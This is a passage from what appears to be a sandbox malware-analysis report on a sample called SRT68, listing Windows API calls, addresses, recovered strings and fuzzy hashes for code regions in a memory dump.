                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                      • String ID:
                                                                      • API String ID: 4090791747-0
                                                                      • Opcode ID: 398cf227decf463f5ec96c40a0b8a4471c35f4eb875e984d4a4ce2f7e1ca514a
                                                                      • Instruction ID: 686f18b159859a860dba05d8dd8fc2f1f06df0ad8caae30a9a07b3245834ae2a
                                                                      • Opcode Fuzzy Hash: 398cf227decf463f5ec96c40a0b8a4471c35f4eb875e984d4a4ce2f7e1ca514a
                                                                      • Instruction Fuzzy Hash: 89E1CF712043029FD714EF28C881B6ABBE1BF85354F18856DF8C58B2A6CB39EC45DB52
                                                                      APIs
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
                                                                        • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 01004D40
                                                                      • _wcscmp.LIBCMT ref: 01004D5A
                                                                      • MoveFileW.KERNEL32(?,?), ref: 01004D75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 793581249-0
                                                                      • Opcode ID: e55f6ffad56e36fcf7db09c5353d7386da62d7f562d5286a0e244791592e0dcf
                                                                      • Instruction ID: ae10e55bccebd5a789f22f8fa80e5170580d37b7132517fb60b3389eabc2f59f
                                                                      • Opcode Fuzzy Hash: e55f6ffad56e36fcf7db09c5353d7386da62d7f562d5286a0e244791592e0dcf
                                                                      • Instruction Fuzzy Hash: EE5151B20083459BD765EBA4DC81DDF77ECAF85350F00092EA2C5D3191EE75A288C76A
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010286FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: 5503a2379b09a0810014d19774534e420cfd0694775474bc42c5a6cd5405f0ba
                                                                      • Instruction ID: df39795b0103bf5f8ea810f1874bfab92f9312c9df67d6be4f3165214336bc30
                                                                      • Opcode Fuzzy Hash: 5503a2379b09a0810014d19774534e420cfd0694775474bc42c5a6cd5405f0ba
                                                                      • Instruction Fuzzy Hash: 6251B538600265BEEB709E28DC89FAD3BE4FB09750F208157FAD0E61A1D77AE550CB50
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FDC2F7
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FDC319
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FDC331
                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FDC34F
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FDC370
                                                                      • DestroyIcon.USER32(00000000), ref: 00FDC37F
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FDC39C
                                                                      • DestroyIcon.USER32(?), ref: 00FDC3AB
                                                                        • Part of subcall function 0102A4AF: DeleteObject.GDI32(00000000), ref: 0102A4E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                      • String ID:
                                                                      • API String ID: 2819616528-0
                                                                      • Opcode ID: b5aa75f527e539386d78eb92ef5d903ad6e2c2b7348cb8122b41fedad4edb77c
                                                                      • Instruction ID: a561a58bd1af71229d540d1875066c35c682b30b2eb3d2713661b0c83f0587f3
                                                                      • Opcode Fuzzy Hash: b5aa75f527e539386d78eb92ef5d903ad6e2c2b7348cb8122b41fedad4edb77c
                                                                      • Instruction Fuzzy Hash: 76518CB1A00206AFDB24DF28CC45FAA37B5FB59360F104529F942D7290DB75ED50EBA0
                                                                      APIs
                                                                        • Part of subcall function 00FFA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FFA84C
                                                                        • Part of subcall function 00FFA82C: GetCurrentThreadId.KERNEL32 ref: 00FFA853
                                                                        • Part of subcall function 00FFA82C: AttachThreadInput.USER32(00000000,?,00FF9683,?,00000001), ref: 00FFA85A
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF968E
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FF96AB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FF96AE
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96B7
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FF96D5
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96D8
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96E1
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FF96F8
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 03dd5c3b570503773eb0c6edd82ad8833451038d5b294ea7c1ada9da20856aaa
                                                                      • Instruction ID: 101b5bb63a9ba96aa2be30730202df7b53e38d4dade395f355ffb105ea822cc1
                                                                      • Opcode Fuzzy Hash: 03dd5c3b570503773eb0c6edd82ad8833451038d5b294ea7c1ada9da20856aaa
                                                                      • Instruction Fuzzy Hash: B711ACB1910219BAF6306F70DC89F6A7A2DEB4C791F600415F384AB0A4CAF75C10DBA4
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FF853C,00000B00,?,?), ref: 00FF892A
                                                                      • HeapAlloc.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8931
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8946
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00FF853C,00000B00,?,?), ref: 00FF894E
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8951
                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8961
                                                                      • GetCurrentProcess.KERNEL32(00FF853C,00000000,?,00FF853C,00000B00,?,?), ref: 00FF8969
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF896C
                                                                      • CreateThread.KERNEL32(00000000,00000000,00FF8992,00000000,00000000,00000000), ref: 00FF8986
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 17012222bbaa939442b63e1b72a861c3a3d567e4f7ac78a5f1e55747ad00da16
                                                                      • Instruction ID: fc3f335b94a4e315ca1486092fb20efae0123098045d89b12021fe6059f60fe6
                                                                      • Opcode Fuzzy Hash: 17012222bbaa939442b63e1b72a861c3a3d567e4f7ac78a5f1e55747ad00da16
                                                                      • Instruction Fuzzy Hash: 4201FF75240308BFE730AFA5DC4EF677B6CEB89750F604410FA04DB195CA759800CB20
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: ad75fb491080a8416482130d866be654a0cedd4be75d2316a2a6a9650235aad4
                                                                      • Instruction ID: 5fcf705b513fa660d4bca170e587f60dde1efb2e3c4dff9d37c5f4c5519ade15
                                                                      • Opcode Fuzzy Hash: ad75fb491080a8416482130d866be654a0cedd4be75d2316a2a6a9650235aad4
                                                                      • Instruction Fuzzy Hash: F2C1D571A0020A9FDF10DF98C894BEEB7F5FF48318F148469EA85AB285E775AD40CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$_memset
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2862541840-625585964
                                                                      • Opcode ID: da0eeb744b6c5ccbf5b07686ad46190225736f0a9dbb0ba949518ee750a2ac7c
                                                                      • Instruction ID: 8f055e3e459a5479f1aaad294c08904720d1224bab1f7ece3549a86194cc5202
                                                                      • Opcode Fuzzy Hash: da0eeb744b6c5ccbf5b07686ad46190225736f0a9dbb0ba949518ee750a2ac7c
                                                                      • Instruction Fuzzy Hash: BB91B171A00205ABDF24CFA5C858FAEBBB8EF45718F00855DF945AB284D7789941CFA0
                                                                      APIs
                                                                        • Part of subcall function 00FF710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
                                                                        • Part of subcall function 00FF710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
                                                                        • Part of subcall function 00FF710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
                                                                        • Part of subcall function 00FF710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01019806
                                                                      • _memset.LIBCMT ref: 01019813
                                                                      • _memset.LIBCMT ref: 01019956
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01019982
                                                                      • CoTaskMemFree.OLE32(?), ref: 0101998D
                                                                      Strings
                                                                      • NULL Pointer assignment, xrefs: 010199DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1300414916-2785691316
                                                                      • Opcode ID: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
                                                                      • Instruction ID: 05ae456b2acc661ba762162f66d90ded8761c7729de8546978293831f6e4c934
                                                                      • Opcode Fuzzy Hash: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
                                                                      • Instruction Fuzzy Hash: 33914771D00229EBDB10DFA5CC90EDEBBB9AF09750F20415AF519A7281DB75AA04CFA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01026E24
                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 01026E38
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01026E52
                                                                      • _wcscat.LIBCMT ref: 01026EAD
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 01026EC4
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01026EF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat
                                                                      • String ID: SysListView32
                                                                      • API String ID: 307300125-78025650
                                                                      • Opcode ID: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
                                                                      • Instruction ID: 2fd6813256b350b24433cd9e55ef0c07f2093da32bb578aa2dae33c1c89e5bec
                                                                      • Opcode Fuzzy Hash: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
                                                                      • Instruction Fuzzy Hash: 8F41A170900319EBEF219F68CC85FEE77F8EF08390F10046AF9C5A7291D67699848B60
                                                                      APIs
                                                                        • Part of subcall function 01003C55: CreateToolhelp32Snapshot.KERNEL32 ref: 01003C7A
                                                                        • Part of subcall function 01003C55: Process32FirstW.KERNEL32(00000000,?), ref: 01003C88
                                                                        • Part of subcall function 01003C55: CloseHandle.KERNEL32(00000000), ref: 01003D52
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9A4
                                                                      • GetLastError.KERNEL32 ref: 0101E9B7
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9E6
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0101EA63
                                                                      • GetLastError.KERNEL32(00000000), ref: 0101EA6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0101EAA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
                                                                      • Instruction ID: 348961450ca891f57e37b6f94e895883f3f6cdbc69f6b01e552be25b14dc9305
                                                                      • Opcode Fuzzy Hash: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
                                                                      • Instruction Fuzzy Hash: F941CE712002019FDB26EF14CC95F6EBBE5AF45314F588458FA829F2D6CBBDA804DB91
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 01003033
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
                                                                      • Instruction ID: c4f4c100978cd1aa8c6e603fa05dcb4726524e89e426772a1ff0762bfcd29b09
                                                                      • Opcode Fuzzy Hash: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
                                                                      • Instruction Fuzzy Hash: A7114631249346BEF757CA19DC42D6F3B9CEF05360F10406EFE40AA1C2DA645A0046A0
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01004312
                                                                      • LoadStringW.USER32(00000000), ref: 01004319
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0100432F
                                                                      • LoadStringW.USER32(00000000), ref: 01004336
                                                                      • _wprintf.LIBCMT ref: 0100435C
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0100437A
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 01004357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 3648134473-3128320259
                                                                      • Opcode ID: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
                                                                      • Instruction ID: 0fde3e72510e1534c5b68c354edb2f20e9d58da341cb7770b2a3d2476990d819
                                                                      • Opcode Fuzzy Hash: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
                                                                      • Instruction Fuzzy Hash: EF01A2F2900209BFE7719BA0DD89EEB777CEB08240F504095FB89E2041EA395E844B74
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0102D47C
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0102D49C
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0102D6D7
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0102D6F5
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0102D716
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0102D735
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0102D75A
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0102D77D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
                                                                      • Instruction ID: 3e5228dcbb32cd525ff821c07a5fc2cab25d472005d792c2b978813c9a2953d7
                                                                      • Opcode Fuzzy Hash: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
                                                                      • Instruction Fuzzy Hash: 3AB17C71500225AFDF24CFA8C5897AD7BF1FF48701F0480A9ED889F299E779A950CB90
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101FDEE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
